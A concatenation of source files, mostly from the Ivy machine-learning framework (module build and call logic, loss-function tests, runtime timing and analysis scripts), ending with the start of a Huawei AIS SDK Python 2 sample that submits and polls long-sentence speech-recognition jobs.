# noinspection PyMethodMayBeStatic,PyUnusedLocal
def _create_variables(self, dev_str):
"""
create internal trainable variables, and return as arbitrary nested dict. Overridable.
:param dev_str: The device string, specifying the device on which to create the variables.
:type dev_str: string
"""
return {}
def _build(self, *args, **kwargs) -> bool:
"""
Build the internal layers and variables for this module. Overridable.
Return False or empty Container if the build only partially completed (i.e. some child Modules have
"on_call" build mode). Alternatviely, return True or a container of the built variables if the module is built.
"""
return True
# Abstract #
@abc.abstractmethod
def _forward(self, *args, **kwargs):
"""
Forward pass of the layer, called after handling the optional input variables.
"""
raise NotImplementedError
def _call(self, *args, v=None, with_grads=True, **kwargs):
"""
the forward pass of the layer, treating layer instance as callable function.
"""
if not self._built:
self.build(*args, **kwargs, from_call=True)
if v is not None:
v_orig = self.v
if not with_grads:
v = v.stop_gradients()
self.v = Container(v)
ret = self._forward(*args, **kwargs)
self.v = v_orig
return ret
elif hasattr(self.__call__, 'wrapped'):
return self.__call__(*args, with_grads=with_grads, **kwargs)
elif not with_grads:
v_orig = self.v
self.v = v_orig.stop_gradients()
ret = self._forward(*args, **kwargs)
self.v = v_orig
return ret
return self._forward(*args, **kwargs)
# Public #
# -------#
def compile_graph(self, *args, v=None, with_grads=True, stateful=None, arg_stateful_idxs=None,
kwarg_stateful_idxs=None, include_generators=True, **kwargs):
stateful = ivy.default(stateful, self._stateful)
arg_stateful_idxs = ivy.default(arg_stateful_idxs, self._arg_stateful_idxs)
kwarg_stateful_idxs = ivy.default(kwarg_stateful_idxs, self._kwarg_stateful_idxs)
stateful = ivy.default(stateful, self._stateful)
if not self._built:
if self._build_mode == 'on_call':
self(*args, v=v, with_grads=with_grads, **kwargs)
elif self._build_mode == 'explicit':
self.build(*args, from_call=False, **kwargs)
elif self._build_mode == 'on_init':
raise Exception('ivy.Module constructor was called but module was not built despite '
'on_init mode being set.')
else:
raise Exception('invalid build_mode, must be one of [ on_call | explicit | on_init ]')
kwargs['v'] = ivy.default(v, self.v)
kwargs['with_grads'] = with_grads
self._compiled_fn = ivy.compile_graph(
self._call, *args, **kwargs, stateful=stateful, arg_stateful_idxs=arg_stateful_idxs,
kwarg_stateful_idxs=kwarg_stateful_idxs, include_generators=include_generators)
self._compiled = True
def show_graph(self, *args, v=None, with_grads=True, stateful=None, arg_stateful_idxs=None,
kwarg_stateful_idxs=None, randomness_factor=0., save_to_disk=False, with_edge_labels=True,
with_arg_labels=True, with_output_labels=True, output_connected_only=True, include_generators=True,
fname=None, **kwargs):
self(*args, v=v, with_grads=with_grads, **kwargs) # for on call build modes
if not self._built:
self.build(*args, from_call=False, **kwargs) # for explicit build modes
kwargs['v'] = ivy.default(v, self.v)
kwargs['with_grads'] = with_grads
ivy.show_graph(self._call, *args, **kwargs, stateful=stateful, arg_stateful_idxs=arg_stateful_idxs,
kwarg_stateful_idxs=kwarg_stateful_idxs, randomness_factor=randomness_factor,
save_to_disk=save_to_disk, with_edge_labels=with_edge_labels, with_arg_labels=with_arg_labels,
with_output_labels=with_output_labels, output_connected_only=output_connected_only,
include_generators=include_generators, fname=fname)
def __call__(self, *args, v=None, with_grads=True, stateful=None, arg_stateful_idxs=None, kwarg_stateful_idxs=None,
**kwargs):
if self._compiled:
try:
return self._compiled_fn(*args, v=ivy.default(v, self.v), with_grads=with_grads, **kwargs)
except Exception as e:
if self._fallback_to_non_compiled:
return self._call(*args, v=v, with_grads=with_grads, **kwargs)
raise e
elif self._compile_on_first_call and not self._compiled:
self.compile_graph(*args, v=v, with_grads=with_grads, stateful=stateful,
arg_stateful_idxs=arg_stateful_idxs, kwarg_stateful_idxs=kwarg_stateful_idxs, **kwargs)
return self._compiled_fn(*args, v=ivy.default(v, self.v), with_grads=with_grads, **kwargs)
return self._call(*args, v=v, with_grads=with_grads, **kwargs)
def save_weights(self, weights_path):
"""
Save the weights on the Module.
:param weights_path: The hdf5 file for saving the weights.
:type weights_path: string
"""
os.makedirs('/'.join(weights_path.split('/')[:-1]), exist_ok=True)
self.v.to_disk_as_hdf5(weights_path)
def build(self, *args, from_call=False, dev_str=None, **kwargs):
"""
Build the internal layers and variables for this module.
"""
self._dev_str = ivy.default(dev_str, self._dev_str)
# return False if not from_call but build_mode is on_call
if not from_call and self._build_mode == 'on_call':
return self.v
# build local Module, and any child modules flagged with "explicit" build mode
built = ivy.default(self._build(*args, **kwargs), True)
# build variables based on locally built layers, if v not passed in constructor
v_from_constructor = self._v_in
if not ivy.exists(v_from_constructor):
vs = Container(dict(**self._find_variables(self), **self._create_variables(self._dev_str)))
self.v = vs
else:
self.v = self.v if isinstance(self.v, Container) else Container(self.v)
# remove duplicates
self.v, keychain_mappings = self._remove_duplicate_variables(self.v)
# build any child 'on_call' layers
if not built and from_call:
# update child modules to share the same device
for k, v in self.__dict__.items():
if isinstance(v, ivy.Module):
v._dev_str = self._dev_str
# build during forward pass
self._forward(*args, **kwargs)
# re-build variables based on additional child on-call layers, if v not passed in constructor
if not ivy.exists(v_from_constructor):
vs = Container(dict(**self._find_variables(self), **self._create_variables(self._dev_str)))
self.v = vs
# remove further duplicates with self.v
self.v, keychain_mappings = self._remove_duplicate_variables(self.v)
# set built flag
built = True
# wrap call methods if the module is fully built
if built:
self._wrap_call_methods(keychain_mappings, obj=self)
# flag built and remove local variables if specified
self._built = bool(built)
v_ret = self.v
if not self._store_vars:
# ToDo: verify variables in self.v are released once this method exits
self.v = ivy.Container()
return v_ret if bool(v_ret) or isinstance(built, bool) else built
# Properties #
# -----------#
@property
def build_mode(self):
return self._build_mode
@property
def built(self):
return self._built
```
#### File: test_nn/test_functional/test_losses.py
```python
import pytest
import numpy as np
# local
import ivy
import ivy.numpy
import ivy_tests.helpers as helpers
# cross_entropy
@pytest.mark.parametrize(
"t_n_p_n_res", [([[0., 1., 0.]], [[0.3, 0.2, 0.5]], [1.609438])])
@pytest.mark.parametrize(
"dtype_str", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_cross_entropy(t_n_p_n_res, dtype_str, tensor_fn, dev_str, call):
# smoke test
true, pred, true_target = t_n_p_n_res
pred = tensor_fn(pred, dtype_str, dev_str)
true = tensor_fn(true, dtype_str, dev_str)
ret = ivy.cross_entropy(true, pred)
# type test
assert ivy.is_array(ret)
# cardinality test
assert list(ret.shape) == [1]
# value test
assert np.allclose(call(ivy.cross_entropy, true, pred), np.asarray(true_target))
# compilation test
if call in [helpers.torch_call]:
# cross_entropy does not have backend implementation,
# pytorch scripting requires direct bindings to work, which bypass get_framework()
return
if not ivy.wrapped_mode():
helpers.assert_compilable(ivy.cross_entropy)
# binary_cross_entropy
@pytest.mark.parametrize(
"t_n_p_n_res", [([[0., 1., 0.]], [[0.3, 0.7, 0.5]], [[0.35667494, 0.35667494, 0.69314718]])])
@pytest.mark.parametrize(
"dtype_str", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_binary_cross_entropy(t_n_p_n_res, dtype_str, tensor_fn, dev_str, call):
# smoke test
true, pred, true_target = t_n_p_n_res
pred = tensor_fn(pred, dtype_str, dev_str)
true = tensor_fn(true, dtype_str, dev_str)
ret = ivy.binary_cross_entropy(true, pred)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == pred.shape
# value test
assert np.allclose(call(ivy.binary_cross_entropy, true, pred), np.asarray(true_target))
# compilation test
if call in [helpers.torch_call]:
# binary_cross_entropy does not have backend implementation,
# pytorch scripting requires direct bindings to work, which bypass get_framework()
return
if not ivy.wrapped_mode():
helpers.assert_compilable(ivy.binary_cross_entropy)
# sparse_cross_entropy
@pytest.mark.parametrize(
"t_n_p_n_res", [([1], [[0.3, 0.2, 0.5]], [1.609438])])
@pytest.mark.parametrize(
"dtype_str", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_sparse_cross_entropy(t_n_p_n_res, dtype_str, tensor_fn, dev_str, call):
# smoke test
true, pred, true_target = t_n_p_n_res
pred = tensor_fn(pred, dtype_str, dev_str)
true = ivy.array(true, 'int32', dev_str)
ret = ivy.sparse_cross_entropy(true, pred)
# type test
assert ivy.is_array(ret)
# cardinality test
assert list(ret.shape) == [1]
# value test
assert np.allclose(call(ivy.sparse_cross_entropy, true, pred), np.asarray(true_target))
# compilation test
if call in [helpers.torch_call]:
# sparse_cross_entropy does not have backend implementation,
# pytorch scripting requires direct bindings to work, which bypass get_framework()
return
if not ivy.wrapped_mode():
helpers.assert_compilable(ivy.sparse_cross_entropy)
```
#### File: Ivy/test_runtime/analyse_runtimes.py
```python
import os
import csv
import json
import numpy as np
import collections
FWS = ['numpy', 'tensorflow', 'torch', 'jax', 'mxnet']
DIM = '{}'.format(int(1e4))
os.makedirs('csvs/{}/'.format(DIM), exist_ok=True)
RATIO_MODE = 'mean'
def _reject_outliers(data, m=1):
return data[abs(data - np.mean(data)) < m * np.std(data)]
def main():
# Read Files #
# -----------#
this_dir = os.path.dirname(os.path.realpath(__file__))
core_log_dir = os.path.join(this_dir, 'test_core_runtime/runtime_analysis/{}'.format(DIM))
core_submodule_dirs = [os.path.join(core_log_dir, submodule_dir) for submodule_dir in os.listdir(core_log_dir)]
nn_log_dir = os.path.join(this_dir, 'test_nn_runtime/runtime_analysis/{}'.format(DIM))
nn_submodule_dirs = [os.path.join(nn_log_dir, submodule_dir) for submodule_dir in os.listdir(nn_log_dir)]
submodule_dirs = core_submodule_dirs + nn_submodule_dirs
filepaths = [os.path.join(submodule_dir, fname) for submodule_dir in submodule_dirs if submodule_dir[-5:] != '.json'
for fname in os.listdir(submodule_dir) if fname[0] != '_']
filepaths.sort()
all_results_dict = dict()
for fpath in filepaths:
method_name = fpath.split('/')[-1].split('.')[0]
these_results_dict = dict()
with open(fpath, 'r') as f:
lines = [l for l in f.readlines() if l != '\n']
f = None
run = -1
for l in lines:
if 'tb0:' in l:
run += 1
these_results_dict[f][run] = dict()
if l[0:13] == "<module 'ivy.":
f = l[13:].split("'")[0]
these_results_dict[f] = dict()
run = -1
elif 'end of analysis' in l:
break
else:
entry_key = l.split(': ')[0]
entry_val = l.split(': ')[1][:-1]
if entry_key not in these_results_dict[f][run]:
these_results_dict[f][run][entry_key] = list()
these_results_dict[f][run][entry_key].append(float(entry_val))
all_results_dict[method_name] = these_results_dict
# Read Reimplemented Functions #
# -----------------------------#
reimplemented_dict = {'jax': {}, 'mxnet': {}, 'numpy': {}, 'tensorflow': {}, 'torch': {}}
json_filepaths = [item for item in submodule_dirs if item[-5:] == '.json']
for json_filepath in json_filepaths:
with open(json_filepath, 'r') as file:
loaded_dict = json.loads(file.read())
reimplemented_dict['jax'] = {**reimplemented_dict['jax'], **loaded_dict['jax']}
reimplemented_dict['mxnet'] = {**reimplemented_dict['mxnet'], **loaded_dict['mxnet']}
reimplemented_dict['numpy'] = {**reimplemented_dict['numpy'], **loaded_dict['numpy']}
reimplemented_dict['tensorflow'] = {**reimplemented_dict['tensorflow'], **loaded_dict['tensorflow']}
reimplemented_dict['torch'] = {**reimplemented_dict['torch'], **loaded_dict['torch']}
# Extract Times #
# --------------#
for method, method_dict in all_results_dict.items():
for f, f_dict in method_dict.items():
# total times
if 'tt0' in f_dict[0] and 'tt1' in f_dict[0]:
total_times_ = np.asarray([run['tt1'][0] - run['tt0'][0] for run in f_dict.values()])
total_times = _reject_outliers(total_times_)
if len(total_times) == 0:
raise Exception('No data left after outlier rejection, consider increasing m.')
total_mean_time = np.mean(total_times)
else:
raise Exception('Total times do not appear to be logged.')
# backend times
if 'tb1' in f_dict[0] and 'tb2' in f_dict[0]:
backend_times_ = np.asarray([np.sum(np.asarray(run['tb2']) - np.asarray(run['tb1']))
for run in f_dict.values()])
elif 'tb3' in f_dict[0] and 'tb4' in f_dict[0]:
backend_times_ = np.asarray([run['tb4'][0] - run['tb3'][0] for run in f_dict.values()])
elif 'tb0' in f_dict[0] and 'tb4' in f_dict[0]:
backend_times_ = total_times_
else:
raise Exception('Not enough backend times logged to compute runtimes.')
backend_times = _reject_outliers(backend_times_)
if len(backend_times) == 0:
raise Exception('No data left after outlier rejection, consider increasing m.')
backend_mean_time = np.mean(backend_times)
# overhead times
if 'to0' in f_dict[0] and 'to1' in f_dict[0]:
overhead_times_ = np.asarray([np.sum(np.asarray(run['to1']) - np.asarray(run['to0']))
for run in f_dict.values()])
overhead_times = _reject_outliers(overhead_times_)
if len(overhead_times) == 0:
raise Exception('No data left after outlier rejection, consider increasing m.')
overhead_mean_time = np.mean(overhead_times)
else:
overhead_mean_time = 0
# override if it's a re-implementation
if method in reimplemented_dict[f] and reimplemented_dict[f][method] == [None]:
backend_mean_time = total_mean_time
overhead_mean_time = 0
# total time
total_mean_time = max(total_mean_time, backend_mean_time + overhead_mean_time)
# results
all_results_dict[method][f].clear()
all_results_dict[method][f]['times'] = dict()
all_results_dict[method][f]['times']['total_time'] = total_mean_time
all_results_dict[method][f]['times']['backend_time'] = backend_mean_time
all_results_dict[method][f]['times']['overhead_time'] = overhead_mean_time
all_results_dict[method][f]['times']['graph_construct_time'] = max(total_mean_time - backend_mean_time - overhead_mean_time, 0)
all_results_dict[method][f]['ratios'] = dict()
backend_ratio = min(max(backend_mean_time / total_mean_time, 0), 1)
all_results_dict[method][f]['ratios']['backend_ratio'] = backend_ratio
ivy_overhead_ratio = min(max(overhead_mean_time / total_mean_time, 0), 1)
all_results_dict[method][f]['ratios']['ivy_overhead_ratio'] = ivy_overhead_ratio
graph_construct_ratio = min(max((total_mean_time - backend_mean_time - overhead_mean_time) / total_mean_time, 0), 1)
all_results_dict[method][f]['ratios']['graph_construct_ratio'] = graph_construct_ratio
# mean times across frameworks
all_results_dict[method]['mean'] = dict()
all_results_dict[method]['mean']['times'] = dict()
all_results_dict[method]['mean']['times']['total_time'] =\
np.mean(np.asarray([all_results_dict[method][fw]['times']['total_time'] for fw in FWS
if fw in all_results_dict[method]]))
all_results_dict[method]['mean']['times']['backend_time'] =\
np.mean(np.asarray([all_results_dict[method][fw]['times']['backend_time'] for fw in FWS
if fw in all_results_dict[method]]))
all_results_dict[method]['mean']['times']['overhead_time'] =\
np.mean(np.asarray([all_results_dict[method][fw]['times']['overhead_time'] for fw in FWS
if fw in all_results_dict[method]]))
all_results_dict[method]['mean']['times']['graph_construct_time'] =\
np.mean(np.asarray([all_results_dict[method][fw]['times']['graph_construct_time'] for fw in FWS
if fw in all_results_dict[method]]))
# mean ratios across frameworks
all_results_dict[method]['mean']['ratios'] = dict()
all_results_dict[method]['mean']['ratios']['backend_ratio'] =\
np.mean(np.asarray([all_results_dict[method][fw]['ratios']['backend_ratio'] for fw in FWS
if fw in all_results_dict[method]]))
all_results_dict[method]['mean']['ratios']['ivy_overhead_ratio'] =\
np.mean(np.asarray([all_results_dict[method][fw]['ratios']['ivy_overhead_ratio'] for fw in FWS
if fw in all_results_dict[method]]))
all_results_dict[method]['mean']['ratios']['graph_construct_ratio'] =\
np.mean(np.asarray([all_results_dict[method][fw]['ratios']['graph_construct_ratio'] for fw in FWS
if fw in all_results_dict[method]]))
# Library Overhead #
# -----------------#
library_usage_fpath = 'library_usage.json'
if os.path.exists(library_usage_fpath):
lib_overhead_dict = dict()
with open(library_usage_fpath, 'r') as file:
usage_dict = json.loads(file.read())
for lib_name, lib_dict in usage_dict.items():
total_runtime = 0
backend_runtime = 0
overhead_runtime = 0
graph_construct_runtime = 0
for method_name, method_occurance in lib_dict.items():
if method_name == 'Container':
continue
tot = all_results_dict[method_name]['mean']['times']['total_time']
total_runtime += method_occurance * tot if not np.isnan(tot) else 0
back = all_results_dict[method_name]['mean']['times']['backend_time']
backend_runtime += method_occurance * back if not np.isnan(back) else 0
over = all_results_dict[method_name]['mean']['times']['overhead_time']
overhead_runtime += method_occurance * over if not np.isnan(over) else 0
graph = all_results_dict[method_name]['mean']['times']['graph_construct_time']
graph_construct_runtime += method_occurance * graph if not np.isnan(graph) else 0
compiled_ratio = overhead_runtime/total_runtime
eager_ratio = (overhead_runtime + graph_construct_runtime)/total_runtime
print('\n{}:\neager_percentage: {}\ncompiled_percentage: {}\n'.format(lib_name, eager_ratio*100, compiled_ratio*100))
# Save Results #
# -------------#
for key_to_save in FWS + ['mean']:
all_results_dict_ordered = collections.OrderedDict(
sorted(all_results_dict.items(),
key=lambda key_n_val: -key_n_val[1][key_to_save]['ratios']['ivy_overhead_ratio']
- key_n_val[1][key_to_save]['ratios']['graph_construct_ratio']
if key_to_save in key_n_val[1] else 0.))
with open('csvs/{}/'.format(DIM) + key_to_save + '_runtime_analysis.csv', 'w+') as file:
csv_writer = csv.writer(file)
for method, res_dict in all_results_dict_ordered.items():
if key_to_save not in res_dict:
continue
csv_writer.writerow([method, str(res_dict[key_to_save]['ratios']['ivy_overhead_ratio']*100),
str(res_dict[key_to_save]['ratios']['graph_construct_ratio'] * 100),
str(res_dict[key_to_save]['ratios']['backend_ratio'] * 100),
'',
str(res_dict[key_to_save]['times']['overhead_time']*1000),
str(res_dict[key_to_save]['times']['graph_construct_time'] * 1000),
str(res_dict[key_to_save]['times']['backend_time']*1000)])
if __name__ == '__main__':
main()
```
#### File: test_runtime/test_core_runtime/test_linalg_runtime.py
```python
DIM = int(1e4)
# global
import os
import random
# local
import ivy.core.general as ivy_gen
import ivy.core.linalg as ivy_linalg
this_file_dir = os.path.dirname(os.path.realpath(__file__))
import with_time_logs.ivy.core.linalg as ivy_linalg_w_time
from ivy import torch as _ivy_torch
from ivy import tensorflow as _ivy_tf
from ivy import mxnet as _ivy_mxnet
from ivy import jax as _ivy_jnp
from ivy import numpy as _ivy_np
from with_time_logs.ivy import torch as _ivy_torch_w_time
from with_time_logs.ivy import tensorflow as _ivy_tf_w_time
from with_time_logs.ivy import mxnet as _ivy_mxnet_w_time
from with_time_logs.ivy import jax as _ivy_jnp_w_time
from with_time_logs.ivy import numpy as _ivy_np_w_time
LIB_DICT = {_ivy_torch: _ivy_torch_w_time,
_ivy_tf: _ivy_tf_w_time,
_ivy_mxnet: _ivy_mxnet_w_time,
_ivy_jnp: _ivy_jnp_w_time,
_ivy_np: _ivy_np_w_time}
# local
import ivy_tests.helpers as helpers
from test_runtime.utils import append_to_file, log_time, write_times, TIMES_DICT
def test_svd():
fname = os.path.join(this_file_dir, 'runtime_analysis/{}/linalg/svd.txt'.format(DIM))
if os.path.exists(fname):
os.remove(fname)
for lib, call in [(l, c) for l, c in helpers.calls if c not in [helpers.tf_graph_call, helpers.mx_graph_call]]:
time_lib = LIB_DICT[lib]
append_to_file(fname, '{}'.format(lib))
x0 = ivy_gen.tensor([[[random.uniform(0, 1), random.uniform(0, 1)],
[random.uniform(0, 1), random.uniform(0, 1)]] for _ in range(DIM)], f=lib)
ivy_linalg.svd(x0, f=lib)
ivy_linalg_w_time.svd(x0, f=time_lib)
TIMES_DICT.clear()
for _ in range(100):
log_time(fname, 'tb0')
ivy_linalg_w_time.svd(x0, f=time_lib)
log_time(fname, 'tb4', time_at_start=True)
log_time(fname, 'tt0')
ivy_linalg.svd(x0, f=lib)
log_time(fname, 'tt1', time_at_start=True)
write_times()
append_to_file(fname, 'end of analysis')
def test_norm():
fname = os.path.join(this_file_dir, 'runtime_analysis/{}/linalg/norm.txt'.format(DIM))
if os.path.exists(fname):
os.remove(fname)
for lib, call in [(l, c) for l, c in helpers.calls if c not in [helpers.tf_graph_call, helpers.mx_graph_call]]:
time_lib = LIB_DICT[lib]
append_to_file(fname, '{}'.format(lib))
x0 = ivy_gen.tensor([[[random.uniform(0, 1), random.uniform(0, 1)],
[random.uniform(0, 1), random.uniform(0, 1)]] for _ in range(DIM)], f=lib)
ivy_linalg.norm(x0, f=lib)
ivy_linalg_w_time.norm(x0, f=time_lib)
TIMES_DICT.clear()
for _ in range(100):
log_time(fname, 'tb0')
ivy_linalg_w_time.norm(x0, f=time_lib)
log_time(fname, 'tb4', time_at_start=True)
log_time(fname, 'tt0')
ivy_linalg.norm(x0, f=lib)
log_time(fname, 'tt1', time_at_start=True)
write_times()
append_to_file(fname, 'end of analysis')
def test_inv():
fname = os.path.join(this_file_dir, 'runtime_analysis/{}/linalg/inv.txt'.format(DIM))
if os.path.exists(fname):
os.remove(fname)
for lib, call in [(l, c) for l, c in helpers.calls if c not in [helpers.tf_graph_call, helpers.mx_graph_call]]:
time_lib = LIB_DICT[lib]
append_to_file(fname, '{}'.format(lib))
x0 = ivy_gen.tensor([[[random.uniform(0, 1), random.uniform(0, 1)],
[random.uniform(0, 1), random.uniform(0, 1)]] for _ in range(DIM)], f=lib)
ivy_linalg.inv(x0, f=lib)
ivy_linalg_w_time.inv(x0, f=time_lib)
TIMES_DICT.clear()
for _ in range(100):
log_time(fname, 'tb0')
ivy_linalg_w_time.inv(x0, f=time_lib)
log_time(fname, 'tb4', time_at_start=True)
log_time(fname, 'tt0')
ivy_linalg.inv(x0, f=lib)
log_time(fname, 'tt1', time_at_start=True)
write_times()
append_to_file(fname, 'end of analysis')
def test_pinv():
fname = os.path.join(this_file_dir, 'runtime_analysis/{}/linalg/pinv.txt'.format(DIM))
if os.path.exists(fname):
os.remove(fname)
for lib, call in [(l, c) for l, c in helpers.calls if c not in [helpers.tf_graph_call, helpers.mx_graph_call]]:
time_lib = LIB_DICT[lib]
append_to_file(fname, '{}'.format(lib))
x0 = ivy_gen.tensor([[[random.uniform(0, 1), random.uniform(0, 1)],
[random.uniform(0, 1), random.uniform(0, 1)]] for _ in range(DIM)], f=lib)
ivy_linalg.pinv(x0, f=lib)
ivy_linalg_w_time.pinv(x0, f=time_lib)
TIMES_DICT.clear()
for _ in range(100):
log_time(fname, 'tb0')
ivy_linalg_w_time.pinv(x0, f=time_lib)
log_time(fname, 'tb4', time_at_start=True)
log_time(fname, 'tt0')
ivy_linalg.pinv(x0, f=lib)
log_time(fname, 'tt1', time_at_start=True)
write_times()
append_to_file(fname, 'end of analysis')
def test_vector_to_skew_symmetric_matrix():
fname = os.path.join(this_file_dir, 'runtime_analysis/{}/linalg/vector_to_skew_symmetric_matrix.txt'.format(DIM))
if os.path.exists(fname):
os.remove(fname)
for lib, call in [(l, c) for l, c in helpers.calls if c not in [helpers.tf_graph_call, helpers.mx_graph_call]]:
time_lib = LIB_DICT[lib]
append_to_file(fname, '{}'.format(lib))
x0 = ivy_gen.tensor([[random.uniform(0, 1), random.uniform(0, 1), random.uniform(0, 1)]
for _ in range(DIM)], f=lib)
ivy_linalg.vector_to_skew_symmetric_matrix(x0, f=lib)
ivy_linalg_w_time.vector_to_skew_symmetric_matrix(x0, f=time_lib)
TIMES_DICT.clear()
for _ in range(100):
log_time(fname, 'tb0')
ivy_linalg_w_time.vector_to_skew_symmetric_matrix(x0, f=time_lib)
log_time(fname, 'tb4', time_at_start=True)
log_time(fname, 'tt0')
ivy_linalg.vector_to_skew_symmetric_matrix(x0, f=lib)
log_time(fname, 'tt1', time_at_start=True)
write_times()
append_to_file(fname, 'end of analysis')
```
#### File: test_runtime/test_core_runtime/test_reductions_runtime.py
```python
DIM = int(1e4)
# global
import os
import random
# local
import ivy.core.general as ivy_gen
import ivy.core.reductions as ivy_red
this_file_dir = os.path.dirname(os.path.realpath(__file__))
import with_time_logs.ivy.core.reductions as ivy_red_w_time
from ivy import torch as _ivy_torch
from ivy import tensorflow as _ivy_tf
from ivy import mxnet as _ivy_mxnet
from ivy import jax as _ivy_jnp
from ivy import numpy as _ivy_np
from with_time_logs.ivy import torch as _ivy_torch_w_time
from with_time_logs.ivy import tensorflow as _ivy_tf_w_time
from with_time_logs.ivy import mxnet as _ivy_mxnet_w_time
from with_time_logs.ivy import jax as _ivy_jnp_w_time
from with_time_logs.ivy import numpy as _ivy_np_w_time
LIB_DICT = {_ivy_torch: _ivy_torch_w_time,
_ivy_tf: _ivy_tf_w_time,
_ivy_mxnet: _ivy_mxnet_w_time,
_ivy_jnp: _ivy_jnp_w_time,
_ivy_np: _ivy_np_w_time}
# local
import ivy_tests.helpers as helpers
from test_runtime.utils import append_to_file, log_time, write_times, TIMES_DICT
def test_reduce_sum():
fname = os.path.join(this_file_dir, 'runtime_analysis/{}/reductions/reduce_sum.txt'.format(DIM))
if os.path.exists(fname):
os.remove(fname)
for lib, call in [(l, c) for l, c in helpers.calls if c not in [helpers.tf_graph_call, helpers.mx_graph_call]]:
time_lib = LIB_DICT[lib]
append_to_file(fname, '{}'.format(lib))
x0 = ivy_gen.tensor([random.uniform(0, 1) for _ in range(DIM)], f=lib)
ivy_red.reduce_sum(x0, f=lib)
ivy_red_w_time.reduce_sum(x0, -1, f=time_lib)
TIMES_DICT.clear()
for _ in range(100):
log_time(fname, 'tb0')
ivy_red_w_time.reduce_sum(x0, -1, f=time_lib)
log_time(fname, 'tb4', time_at_start=True)
log_time(fname, 'tt0')
ivy_red.reduce_sum(x0, -1, f=lib)
log_time(fname, 'tt1', time_at_start=True)
write_times()
append_to_file(fname, 'end of analysis')
def test_reduce_prod():
fname = os.path.join(this_file_dir, 'runtime_analysis/{}/reductions/reduce_prod.txt'.format(DIM))
if os.path.exists(fname):
os.remove(fname)
for lib, call in [(l, c) for l, c in helpers.calls if c not in [helpers.tf_graph_call, helpers.mx_graph_call]]:
time_lib = LIB_DICT[lib]
append_to_file(fname, '{}'.format(lib))
x0 = ivy_gen.tensor([random.uniform(0, 1) for _ in range(DIM)], f=lib)
ivy_red.reduce_prod(x0, f=lib)
ivy_red_w_time.reduce_prod(x0, -1, f=time_lib)
TIMES_DICT.clear()
for _ in range(100):
log_time(fname, 'tb0')
ivy_red_w_time.reduce_prod(x0, -1, f=time_lib)
log_time(fname, 'tb4', time_at_start=True)
log_time(fname, 'tt0')
ivy_red.reduce_prod(x0, -1, f=lib)
log_time(fname, 'tt1', time_at_start=True)
write_times()
append_to_file(fname, 'end of analysis')
def test_reduce_mean():
fname = os.path.join(this_file_dir, 'runtime_analysis/{}/reductions/reduce_mean.txt'.format(DIM))
if os.path.exists(fname):
os.remove(fname)
for lib, call in [(l, c) for l, c in helpers.calls if c not in [helpers.tf_graph_call, helpers.mx_graph_call]]:
time_lib = LIB_DICT[lib]
append_to_file(fname, '{}'.format(lib))
x0 = ivy_gen.tensor([random.uniform(0, 1) for _ in range(DIM)], f=lib)
ivy_red.reduce_mean(x0, f=lib)
ivy_red_w_time.reduce_mean(x0, -1, f=time_lib)
TIMES_DICT.clear()
for _ in range(100):
log_time(fname, 'tb0')
ivy_red_w_time.reduce_mean(x0, -1, f=time_lib)
log_time(fname, 'tb4', time_at_start=True)
log_time(fname, 'tt0')
ivy_red.reduce_mean(x0, -1, f=lib)
log_time(fname, 'tt1', time_at_start=True)
write_times()
append_to_file(fname, 'end of analysis')
def test_reduce_min():
fname = os.path.join(this_file_dir, 'runtime_analysis/{}/reductions/reduce_min.txt'.format(DIM))
if os.path.exists(fname):
os.remove(fname)
for lib, call in [(l, c) for l, c in helpers.calls if c not in [helpers.tf_graph_call, helpers.mx_graph_call]]:
time_lib = LIB_DICT[lib]
append_to_file(fname, '{}'.format(lib))
x0 = ivy_gen.tensor([random.uniform(0, 1) for _ in range(DIM)], f=lib)
ivy_red.reduce_min(x0, f=lib)
ivy_red_w_time.reduce_min(x0, -1, f=time_lib)
TIMES_DICT.clear()
for _ in range(100):
log_time(fname, 'tb0')
ivy_red_w_time.reduce_min(x0, -1, f=time_lib)
log_time(fname, 'tb4', time_at_start=True)
log_time(fname, 'tt0')
ivy_red.reduce_min(x0, -1, f=lib)
log_time(fname, 'tt1', time_at_start=True)
write_times()
append_to_file(fname, 'end of analysis')
def test_reduce_max():
fname = os.path.join(this_file_dir, 'runtime_analysis/{}/reductions/reduce_max.txt'.format(DIM))
if os.path.exists(fname):
os.remove(fname)
for lib, call in [(l, c) for l, c in helpers.calls if c not in [helpers.tf_graph_call, helpers.mx_graph_call]]:
time_lib = LIB_DICT[lib]
append_to_file(fname, '{}'.format(lib))
x0 = ivy_gen.tensor([random.uniform(0, 1) for _ in range(DIM)], f=lib)
ivy_red.reduce_max(x0, f=lib)
ivy_red_w_time.reduce_max(x0, -1, f=time_lib)
TIMES_DICT.clear()
for _ in range(100):
log_time(fname, 'tb0')
ivy_red_w_time.reduce_max(x0, -1, f=time_lib)
log_time(fname, 'tb4', time_at_start=True)
log_time(fname, 'tt0')
ivy_red.reduce_max(x0, -1, f=lib)
log_time(fname, 'tt1', time_at_start=True)
write_times()
append_to_file(fname, 'end of analysis')
``` |
{
"source": "798000648/ais-sdk",
"score": 3
} |
#### File: rest-client-samples/asr/long_sentence.py
```python
import urllib2
import json
import time
import ssl
from gettoken import get_token
from utils import encode_to_base64
from urllib2 import HTTPError, URLError
#
# access asr, long_sentence
#
def long_sentence(token, data, url=''):
status, r = _long_sentence(token, data, url)
if status != 200:
print 'Process long sentence asr failed: summit job failed.'
return ''
submit_result = json.loads(r)
job_id = submit_result['result'].get('job_id', '')
print "Process job id is :", job_id
words = ''
time.sleep(1.0)
try:
while True:
status, r = _get_result(token, job_id)
if status != 200:
print 'Process long sentence asr failed: get result failed.'
break
rec_result = json.loads(r)
process_status = rec_result["result"].get('status_code', 1)
if process_status == -1:
print 'Process long sentence asr failed: get result failed.'
break
elif process_status == 2:
words = rec_result["result"].get('words', '')
break
#
# process_status == 0 || process_status == 1
#
else:
time.sleep(2.0)
continue
except Exception:
return ''
return words
#
# long_sentence, post the data
#
def _long_sentence(token, data, url):
_url = 'https://ais.cn-north-1.myhuaweicloud.com/v1.0/voice/asr/long-sentence'
_data = {
"url":url,
"data": data
}
kreq = urllib2.Request( url = _url)
kreq.add_header('Content-Type', 'application/json')
kreq.add_header('X-Auth-Token', token )
kreq.add_data(json.dumps(_data))
resp = None
status_code = None
try:
#
# Here we use the unvertified-ssl-context, Because in FunctionStage
# the client CA-validation have some problem, so we must do this.
